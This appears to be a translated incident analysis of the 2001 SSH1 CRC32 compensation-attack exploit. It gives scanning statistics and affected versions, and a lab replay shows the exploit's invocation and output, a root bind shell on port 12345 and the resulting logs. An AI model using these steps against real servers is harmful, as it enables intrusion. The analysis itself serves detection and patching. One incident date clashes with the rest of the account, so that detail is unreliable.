Identifying the SSH crc32 compensation attack detector exploit
Published: 2024-01-18  Source: compiled by 明輝站
Since the code for the SSH crc32 compensation attack detector exploit began to circulate, scanning for SSH servers has increased markedly. The following is a statistical report:
+------------+------------+----------+----------+-----------+
| date       |    #Probes | #Sources | #Targets | #Scanners |
+------------+------------+----------+----------+-----------+
| 2001-10-03 |       1466 |       45 |      987 |           |
| 2001-10-04 |        319 |       25 |      212 |           |
| 2001-10-05 |        825 |       22 |      783 |           |
| 2001-10-06 |      86552 |       27 |    86305 |           |
| 2001-10-07 |       7564 |       29 |     7429 |           |
| 2001-10-08 |       2506 |       29 |     2449 |           |
| 2001-10-09 |       1010 |       18 |      263 |           |
| 2001-10-10 |        480 |       39 |      307 |           |
| 2001-10-11 |        978 |       31 |      504 |           |
| 2001-10-12 |        436 |       21 |      311 |           |
| 2001-10-13 |       6731 |       27 |     6353 |           |
| 2001-10-14 |       1411 |       29 |     1084 |           |
| 2001-10-15 |        936 |       34 |      723 |           |
| 2001-10-16 |       1358 |       40 |     1256 |           |
| 2001-10-17 |       1098 |       36 |      899 |           |
| 2001-10-18 |       1779 |       31 |     1438 |           |
| 2001-10-19 |      19722 |       28 |    19573 |         7 |
| 2001-10-20 |      25539 |       21 |    25419 |         3 |
| 2001-10-21 |       6796 |       26 |     6750 |         9 |
| 2001-10-22 |        807 |       30 |      482 |         5 |
| 2001-10-23 |        578 |       49 |      327 |         6 |
| 2001-10-24 |       2198 |       39 |     2025 |         9 |
| 2001-10-25 |       2368 |       31 |     1759 |         6 |
| 2001-10-26 |        712 |       37 |      591 |         7 |
| 2001-10-27 |        463 |       30 |      297 |         8 |
| 2001-10-28 |        495 |       30 |      263 |         5 |
| 2001-10-29 |        478 |       37 |      399 |         5 |
| 2001-10-30 |       1154 |       48 |     1051 |         5 |
| 2001-10-31 |       1998 |       46 |     1047 |         5 |
| 2001-11-01 |      66660 |       46 |    66386 |         5 |
| 2001-11-02 |       1514 |       40 |      926 |         5 |
| 2001-11-03 |       2142 |       36 |     2047 |         8 |
| 2001-11-04 |       1233 |       26 |      781 |         9 |
+------------+------------+----------+----------+-----------+
In view of this, we have compiled and translated the article by David A. Dittrich <dittrich@cac.washington.edu> (http://staff.washington.edu/dittrich/misc/ssh-analysis.txt) for reference and to help with patching.
-------------------------------------------------------------------------------
Overview
==================
This vulnerability was first disclosed by CORE-SDI in their security advisory CORE-20010207, dated February 8, 2001, on the BUGTRAQ list at securityfocus.com:
http://www.securityfocus.com/advisories/3088
In brief: an integer overflow exists in a piece of code shipped with the ssh1 daemon. The problem is in deattack.c, written by CORE SDI to protect the SSH1 protocol against the CRC32 compensation attack.
In detect_attack(), a 16-bit unsigned variable is mistakenly used as if it were 32 bits wide, so the hash-table index overflows.
This lets an attacker overwrite memory at arbitrary locations and potentially obtain root privileges remotely.
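As an added illustration (not code from the advisory, from this article or from the SSH sources), the following Python models the hash-table sizing arithmetic of detect_attack() that the paragraph above describes, placing the 16-bit store beside the 32-bit fix. The constants HASH_MINSIZE, HASH_ENTRYSIZE, HASH_FACTOR and SSH_BLOCKSIZE are my assumption from reading deattack.c; they are not given on this page.

```python
"""Model of the hash-table sizing in detect_attack() (deattack.c).

Added example; the constants are an assumption taken from my reading of
deattack.c in OpenSSH 2.1.x / ssh-1.2.x, not from this page.
"""

HASH_MINSIZE = 8192    # bytes reserved for the detector's hash table
HASH_ENTRYSIZE = 2     # each entry is a u_int16_t
SSH_BLOCKSIZE = 8      # SSH1 cipher block size; one table entry per block


def hash_factor(x: int) -> int:
    """HASH_FACTOR(x) = x * 3 / 2 in the C source: the table is kept sparse."""
    return x * 3 // 2


def grow_table(packet_len: int) -> int:
    """The 32-bit loop variable 'l': start at the minimum entry count and grow
    by a factor of four until it covers the blocks in the packet."""
    l = HASH_MINSIZE // HASH_ENTRYSIZE            # 4096 entries
    while l < hash_factor(packet_len // SSH_BLOCKSIZE):
        l <<= 2
    return l & 0xFFFFFFFF


def table_entries_vulnerable(packet_len: int) -> int:
    """'n = l' with n declared u_int16_t: the value is truncated to 16 bits.
    A packet large enough to push l to 0x10000 makes n == 0, so the table
    allocated with n * HASH_ENTRYSIZE bytes has no entries at all."""
    return grow_table(packet_len) & 0xFFFF


def table_entries_fixed(packet_len: int) -> int:
    """The fix declares n as u_int32_t, so the entry count survives intact."""
    return grow_table(packet_len)


def index_mask(n: int) -> int:
    """detect_attack() indexes the table as h[HASH(c) & (n - 1)]. In C the
    u_int16_t n is promoted to int, so n == 0 gives a mask of all ones."""
    return (n - 1) & 0xFFFFFFFF


def indices_stay_in_table(n: int) -> bool:
    """True when every masked index is below the number of allocated entries."""
    return n > 0 and index_mask(n) < n


if __name__ == "__main__":
    for size in (1024, 160_000):
        n_vuln, n_fix = table_entries_vulnerable(size), table_entries_fixed(size)
        print(f"packet_len={size}: u_int16_t n={n_vuln} (in bounds: "
              f"{indices_stay_in_table(n_vuln)}), u_int32_t n={n_fix} (in bounds: "
              f"{indices_stay_in_table(n_fix)})")
```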
Other organizations have since published their own analyses of and recommendations for this SSH vulnerability, for example:
http://xforce.iss.net/alerts/advise100.php
http://razor.bindview.com/publish/advisories/adv_ssh1crc.html
http://www.securityfocus.com/bugid=2347
On October 21, 2001, Jay Dyson reported on the incidents@securityfocus.com mailing list that there was considerable evidence of scanning for SSH servers in RIPE address space:
http://www.securityfocus.com/cgi-bin/archive.pl?id=75&start=2001-10-27&end=2001-11-02&mid=221998&threads=1
Worse, a post on the vuln-dev@securityfocus.com list pointed to a Newsbytes.com story reporting that someone was offering US$1000 for this attack tool. There were also unconfirmed rumours that exploit code for Solaris 8/SPARC running SSH.com 1.2.26-31 exists. The well-known security site securitynewsportal.com was compromised through this vulnerability; a mirror of the defacement is at:
http://defaced.alldas.de/mirror/2001/10/24/www.securitynewsportal.com/
TESO has recently released a statement about this exploit code, which you can read at:
http://www.team-teso.org/sshd_statement.php
The affected SSH versions are:
SSH Communications Security SSH 2.x and 3.x (if SSH Version 1 fallback is enabled)
SSH Communications Security SSH 1.2.23-1.2.31
F-Secure SSH versions prior to 1.3.11-2
OpenSSH versions prior to 2.3.0 (if SSH Version 1 fallback is enabled)
OSSH 1.5.7
Vendors have published patch information for their systems; see:
http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm
http://openssh.org/security.html
http://www.cisco.com/warp/public/707/SSH-multiple-pub.html
---------------------------------------------------------------------------
Analysis of the attack
=====================
On October 6, 2001, an attacker operating from a network segment in the Netherlands used the crc32 compensation attack detector exploit to break into a Red Hat Linux system on the UW network running OpenSSH 2.1.1. The vulnerability is described in CERT VU#945216:
http://www.kb.cert.org/vuls/id/945216
A number of operating system commands were replaced with trojaned versions to allow re-entry later, and all system logs were wiped. A second SSH server was run on the high port 39999/tcp, and after the break-in the system was used to scan networks outside UW for more systems running OpenSSH 2.1.1.
The exploit was recovered from the system and analysed:
The exploit code is based on OpenSSH 2.2.0 (the version after 2.1.1, in which the crc32 compensation attack detection function was patched), but it targets OpenSSH 2.1.1; it also works against ssh.com 1.2.31 (testing against other SSH protocol 1 implementations and versions was not completed).
The exploit targets the following systems:
linux/x86 ssh.com 1.2.26-1.2.31 rhl
linux/x86 openssh 1.2.3 (maybe others)
linux/x86 openssh 2.2.0p1 (maybe others)
freebsd 4.x, ssh.com 1.2.26-1.2.31 rhl
Although the exploit can attack several platforms, this attacker scanned only for 22/tcp, connected to the responding systems to obtain their version banner, and proceeded only against "OpenSSH_2.1.1".
The scans used a fast SYN scanner taken from the t0rn rootkit.
Analysis of the compromised system found that 47067 addresses had been scanned; 1244 of those hosts were identified as vulnerable, and the attacker had successfully broken into 4 hosts before the system was taken offline on August 8.
The exploit does not work against systems that use access control restrictions (e.g., SSH.com's "AllowHosts" or "DenyHosts" settings) or packet filtering (e.g., ipchains, iptables, ipf), because these require the public key exchange to take place.
-------------------------------------------------------------------------
Live analysis of the exploit
============================
此攻擊代碼在隔離的網(wǎng)絡(luò)段進(jìn)行測(cè)試,使用了網(wǎng)絡(luò)地址為10.10.10.0/24,攻擊
主機(jī)使用了10.10.10.10 而有漏洞的服務(wù)主機(jī)為 10.10.10.3。
有漏洞的服務(wù)主機(jī)系統(tǒng)運(yùn)行了在Red Hat Linux6.0(Kernel 2.2.16-3 on an i586)
的SSH.com的 1.2.31 版本。
而攻擊主機(jī)運(yùn)行了Fred Cohen's PLAC[1] (從CD-ROM引導(dǎo)的Linux 2.4.5 系統(tǒng)),
文件使用"nc"(Netcat)[2]拷貝到系統(tǒng)中.
攻擊一方再現(xiàn)
=========================
當(dāng)以沒(méi)有任何參數(shù)運(yùn)行攻擊代碼的時(shí)候會(huì)顯示使用信息:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
root@plac /bin >> ./ssh
linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from
openssh 2.2.0 src
greets: mray, random, big t, sh1fty, scut, dvorak
ps. this sploit already owned cia.gov :/
**please pick a type**
Usage: ./ssh host [options]
Options:
-p port
-b base Base address to start bruteforcing distance, by default 0x1800,
goes as high as 0x10000
-t type
-d debug mode
-o Add this to delta_min
types:
0: linux/x86 ssh.com 1.2.26-1.2.31 rhl
1: linux/x86 openssh 1.2.3 (maybe others)
2: linux/x86 openssh 2.2.0p1 (maybe others)
3: freebsd 4.x, ssh.com 1.2.26-1.2.31 rhl
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The system under test ran SSH.com version 1.2.31 (unpatched) on port 2222, with its syslog output directed to a separate file, sshdx.log.
Type 0 and target port 2222 were selected:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
root@plac /bin >> ./ssh 10.10.10.3 -p 2222 -t 0
linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from
openssh 2.2.0 src
greets: mray, random, big t, sh1fty, scut, dvorak
ps. this sploit already owned cia.gov :/
...........................
bruteforced distance: 0x3200
bruteforcing distance from h->partial packet buffer on stack
..............^[[A................ ////////\\\\!
bruteforced h->ident buff distance: 5bfbed88
trying retloc_delta: 35
....!
found high words of possible return address: 808
trying to exploit
....
trying retloc_delta: 37
.!
found high words of possible return address: 805
trying to exploit
....
trying retloc_delta: 39
......
trying retloc_delta: 3b
......
trying retloc_delta: 3d
!
found high words of possible return address: 804
trying to exploit
....
trying retloc_delta: 3f
......
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
At this point the exploit appeared to have "stalled"; going back to the target system, however, showed that a backdoor had been opened.
Reproduction from the target's side
=======================
Before exploitation, the target showed the standard SSH daemon on 22/tcp and the daemon under test on 2222/tcp, both listening, with the standard daemon holding one external connection (10.10.10.2:33354), as netstat shows:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
After the exploit "stalled", netstat on the target showed the following listening state:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:2222 10.10.10.10:32965 ESTABLISHED
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
A new service is listening on 12345/tcp.
Checking the network state with netstat again shows the program's brute-force address guessing: every attempt is a separate, short-lived connection to port 2222:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN
tcp 1252 0 10.10.10.3:2222 10.10.10.10:33076 ESTABLISHED
tcp 0 0 10.10.10.3:2222 10.10.10.10:33075 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33074 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33072 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33071 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33069 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33067 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33066 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33064 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33063 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33062 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33061 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33060 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33059 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33058 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33056 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33055 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33053 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33051 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33050 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33048 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33047 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33046 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33042 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33041 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33040 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33039 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33038 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33036 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33035 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33034 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33033 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33032 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33030 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33029 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33028 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33027 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33024 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33023 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33022 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33021 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33020 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33016 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33014 TIME_WAIT
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The LiSt Open Files tool ("lsof")[4] shows that the SSH daemon under test has opened a new listening port:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# lsof -p 9364
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
sshd 9364 root cwd DIR 3,3 1024 2 /
sshd 9364 root rtd DIR 3,3 1024 2 /
sshd 9364 root txt REG 3,3 655038 442413 /usr/local/src/ssh-1.2.31/sbin/sshd1
sshd 9364 root mem REG 3,3 340771 30722 /lib/ld-2.1.3.so
sshd 9364 root mem REG 3,3 370141 31107 /lib/libnsl-2.1.3.so
sshd 9364 root mem REG 3,3 66231 31103 /lib/libcrypt-2.1.3.so
sshd 9364 root mem REG 3,3 47008 31113 /lib/libutil-2.1.3.so
sshd 9364 root mem REG 3,3 4101836 31102 /lib/libc-2.1.3.so
sshd 9364 root mem REG 3,3 246652 31109 /lib/libnss_files-2.1.3.so
sshd 9364 root mem REG 3,3 252234 31111 /lib/libnss_nisplus-2.1.3.so
sshd 9364 root mem REG 3,3 255963 31110 /lib/libnss_nis-2.1.3.so
sshd 9364 root mem REG 3,3 67580 31108 /lib/libnss_dns-2.1.3.so
sshd 9364 root mem REG 3,3 169720 31112 /lib/libresolv-2.1.3.so
sshd 9364 root 0u CHR 1,3 4110 /dev/null
sshd 9364 root 1u CHR 1,3 4110 /dev/null
sshd 9364 root 2u CHR 1,3 4110 /dev/null
sshd 9364 root 3u inet 10202 TCP *:12345 (LISTEN)
sshd 9364 root 4u inet 10197 TCP 10.10.10.3:2222->10.10.10.10:33190 (CLOSE_WAIT)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Clearly the exploit succeeded in obtaining a root shell and bound it to a high TCP port. The attacker can now connect to that port with any "telnet" or "nc" client and execute arbitrary commands as the superuser, as shown below:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
root@plac ~ >> telnet 10.10.10.3 12345
Trying 10.10.10.3...
Connected to 10.10.10.3.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
date;
Thu Nov 1 18:04:42 PST 2001
netstat -an --inet;
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 10.10.10.3:12345 10.10.10.10:33077 ESTABLISHED
tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN
tcp 1252 0 10.10.10.3:2222 10.10.10.10:33076 ESTABLISHED
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
exit;
Connection closed by foreign host.
root@plac ~ >>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[Note]: commands must be terminated with ";" when using telnet; an nc connection does not need this.
After the attacker disconnects, the target's network state returns to normal:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
If syslog logging is enabled, every connection and brute-force attempt is recorded (note: this is for SSH.com 1.2.31 on Red Hat Linux 6.0; the log tags and messages differ from OpenSSH's):
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Nov 1 18:46:14 victim sshd[9510]: log: Connection from 10.10.10.10 port 33298
Nov 1 18:46:19 victim sshd[9511]: log: Connection from 10.10.10.10 port 33299
Nov 1 18:46:22 victim sshd[9512]: log: Connection from 10.10.10.10 port 33300
Nov 1 18:46:26 victim sshd[9513]: log: Connection from 10.10.10.10 port 33301
Nov 1 18:46:31 victim sshd[9515]: log: Connection from 10.10.10.10 port 33302
Nov 1 18:46:35 victim sshd[9516]: log: Connection from 10.10.10.10 port 33303
Nov 1 18:46:39 victim sshd[9517]: log: Connection from 10.10.10.10 port 33304
Nov 1 18:46:43 victim sshd[9518]: log: Connection from 10.10.10.10 port 33305
Nov 1 18:46:47 victim sshd[9518]: fatal: Local: Corrupted check bytes on input.
Nov 1 18:46:47 victim sshd[9519]: log: Connection from 10.10.10.10 port 33306
Nov 1 18:46:52 victim sshd[9519]: fatal: Connection closed by remote host.
Nov 1 18:46:53 victim sshd[9520]: log: Connection from 10.10.10.10 port 33307
Nov 1 18:46:57 victim sshd[9521]: log: Connection from 10.10.10.10 port 33308
Nov 1 18:47:01 victim sshd[9522]: log: Connection from 10.10.10.10 port 33309
Nov 1 18:47:06 victim sshd[9523]: log: Connection from 10.10.10.10 port 33310
Nov 1 18:47:10 victim sshd[9524]: log: Connection from 10.10.10.10 port 33311
Nov 1 18:47:14 victim sshd[9525]: log: Connection from 10.10.10.10 port 33312
Nov 1 18:47:19 victim sshd[9526]: log: Connection from 10.10.10.10 port 33313
Nov 1 18:47:24 victim sshd[9527]: log: Connection from 10.10.10.10 port 33314
Nov 1 18:47:24 victim sshd[9527]: fatal: Connection closed by remote host.
Nov 1 18:47:46 victim sshd[9528]: log: Connection from 10.10.10.10 port 33315
Nov 1 18:47:46 victim sshd[9529]: log: Connection from 10.10.10.10 port 33316
Nov 1 18:47:47 victim sshd[9530]: log: Connection from 10.10.10.10 port 33317
Nov 1 18:47:47 victim sshd[9531]: log: Connection from 10.10.10.10 port 33318
Nov 1 18:47:47 victim sshd[9532]: log: Connection from 10.10.10.10 port 33319
Nov 1 18:47:48 victim sshd[9533]: log: Connection from 10.10.10.10 port 33320
Nov 1 18:47:48 victim sshd[9534]: log: Connection from 10.10.10.10 port 33321
Nov 1 18:47:48 victim sshd[9535]: log: Connection from 10.10.10.10 port 33322
Nov 1 18:47:49 victim sshd[9536]: log: Connection from 10.10.10.10 port 33323
Nov 1 18:47:49 victim sshd[9537]: log: Connection from 10.10.10.10 port 33324
Nov 1 18:47:50 victim sshd[9538]: log: Connection from 10.10.10.10 port 33325
Nov 1 18:47:50 victim sshd[9539]: log: Connection from 10.10.10.10 port 33326
Nov 1 18:47:50 victim sshd[9540]: log: Connection from 10.10.10.10 port 33327
Nov 1 18:47:51 victim sshd[9541]: log: Connection from 10.10.10.10 port 33328
Nov 1 18:47:51 victim sshd[9542]: log: Connection from 10.10.10.10 port 33329
Nov 1 18:47:51 victim sshd[9543]: log: Connection from 10.10.10.10 port 33330
Nov 1 18:47:52 victim sshd[9544]: log: Connection from 10.10.10.10 port 33331
Nov 1 18:47:52 victim sshd[9545]: log: Connection from 10.10.10.10 port 33332
Nov 1 18:47:52 victim sshd[9546]: log: Connection from 10.10.10.10 port 33333
Nov 1 18:47:53 victim sshd[9547]: log: Connection from 10.10.10.10 port 33334
Nov 1 18:47:53 victim sshd[9548]: log: Connection from 10.10.10.10 port 33335
Nov 1 18:47:54 victim sshd[9549]: log: Connection from 10.10.10.10 port 33336
Nov 1 18:47:54 victim sshd[9550]: log: Connection from 10.10.10.10 port 33337
Nov 1 18:47:54 victim sshd[9551]: log: Connection from 10.10.10.10 port 33338
Nov 1 18:47:55 victim sshd[9552]: log: Connection from 10.10.10.10 port 33339
Nov 1 18:47:55 victim sshd[9553]: log: Connection from 10.10.10.10 port 33340
Nov 1 18:47:55 victim sshd[9554]: log: Connection from 10.10.10.10 port 33341
Nov 1 18:47:56 victim sshd[9555]: log: Connection from 10.10.10.10 port 33342
Nov 1 18:47:56 victim sshd[9556]: log: Connection from 10.10.10.10 port 33343
Nov 1 18:47:56 victim sshd[9555]: fatal: Local: Corrupted check bytes on input.
Nov 1 18:47:57 victim sshd[9557]: log: Connection from 10.10.10.10 port 33344
Nov 1 18:47:57 victim sshd[9558]: log: Connection from 10.10.10.10 port 33345
Nov 1 18:47:57 victim sshd[9559]: log: Connection from 10.10.10.10 port 33346
Nov 1 18:47:58 victim sshd[9560]: log: Connection from 10.10.10.10 port 33347
Nov 1 18:47:58 victim sshd[9561]: log: Connection from 10.10.10.10 port 33348
Nov 1 18:47:59 victim sshd[9562]: log: Connection from 10.10.10.10 port 33349
Nov 1 18:47:59 victim sshd[9563]: log: Connection from 10.10.10.10 port 33350
Nov 1 18:47:59 victim sshd[9564]: log: Connection from 10.10.10.10 port 33351
Nov 1 18:48:00 victim sshd[9565]: log: Connection from 10.10.10.10 port 33352
Nov 1 18:48:00 victim sshd[9566]: log: Connection from 10.10.10.10 port 33353
Nov 1 18:48:00 victim sshd[9567]: log: Connection from 10.10.10.10 port 33354
Nov 1 18:48:01 victim sshd[9568]: log: Connection from 10.10.10.10 port 33355
Nov 1 18:48:01 victim sshd[9569]: log: Connection from 10.10.10.10 port 33356
Nov 1 18:48:02 victim sshd[9570]: log: Connection from 10.10.10.10 port 33357
Nov 1 18:48:02 victim sshd[9571]: log: Connection from 10.10.10.10 port 33358
Nov 1 18:48:02 victim sshd[9572]: log: Connection from 10.10.10.10 port 33359
Nov 1 18:48:03 victim sshd[9573]: log: Connection from 10.10.10.10 port 33360
Nov 1 18:48:03 victim sshd[9574]: log: Connection from 10.10.10.10 port 33361
Nov 1 18:48:03 victim sshd[9575]: log: Connection from 10.10.10.10 port 33362
Nov 1 18:48:04 victim sshd[9576]: log: Connection from 10.10.10.10 port 33363
Nov 1 18:48:04 victim sshd[9577]: log: Connection from 10.10.10.10 port 33364
Nov 1 18:48:04 victim sshd[9578]: log: Connection from 10.10.10.10 port 33365
Nov 1 18:48:05 victim sshd[9579]: log: Connection from 10.10.10.10 port 33366
Nov 1 18:48:05 victim sshd[9580]: log: Connection from 10.10.10.10 port 33367
Nov 1 18:48:06 victim sshd[9581]: log: Connection from 10.10.10.10 port 33368
Nov 1 18:48:06 victim sshd[9582]: log: Connection from 10.10.10.10 port 33369
Nov 1 18:48:06 victim sshd[9583]: log: Connection from 10.10.10.10 port 33370
Nov 1 18:48:07 victim sshd[9584]: log: Connection from 10.10.10.10 port 33371
Nov 1 18:48:07 victim sshd[9585]: log: Connection from 10.10.10.10 port 33372
Nov 1 18:48:07 victim sshd[9586]: log: Connection from 10.10.10.10 port 33373
Nov 1 18:48:08 victim sshd[9587]: log: Connection from 10.10.10.10 port 33374
Nov 1 18:48:08 victim sshd[9586]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:08 victim sshd[9588]: log: Connection from 10.10.10.10 port 33375
Nov 1 18:48:08 victim sshd[9587]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:08 victim sshd[9589]: log: Connection from 10.10.10.10 port 33376
Nov 1 18:48:08 victim sshd[9588]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:09 victim sshd[9590]: log: Connection from 10.10.10.10 port 33377
Nov 1 18:48:09 victim sshd[9589]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:09 victim sshd[9591]: log: Connection from 10.10.10.10 port 33378
Nov 1 18:48:09 victim sshd[9590]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:09 victim sshd[9592]: log: Connection from 10.10.10.10 port 33379
Nov 1 18:48:09 victim sshd[9591]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:10 victim sshd[9592]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:10 victim sshd[9593]: log: Connection from 10.10.10.10 port 33380
Nov 1 18:48:10 victim sshd[9594]: log: Connection from 10.10.10.10 port 33381
Nov 1 18:48:10 victim sshd[9593]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:11 victim sshd[9595]: log: Connection from 10.10.10.10 port 33382
Nov 1 18:48:11 victim sshd[9594]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:11 victim sshd[9596]: log: Connection from 10.10.10.10 port 33383
Nov 1 18:48:11 victim sshd[9597]: log: Connection from 10.10.10.10 port 33384
Nov 1 18:48:11 victim sshd[9596]: fatal: Local: crc32 compensation attack: network attack detected
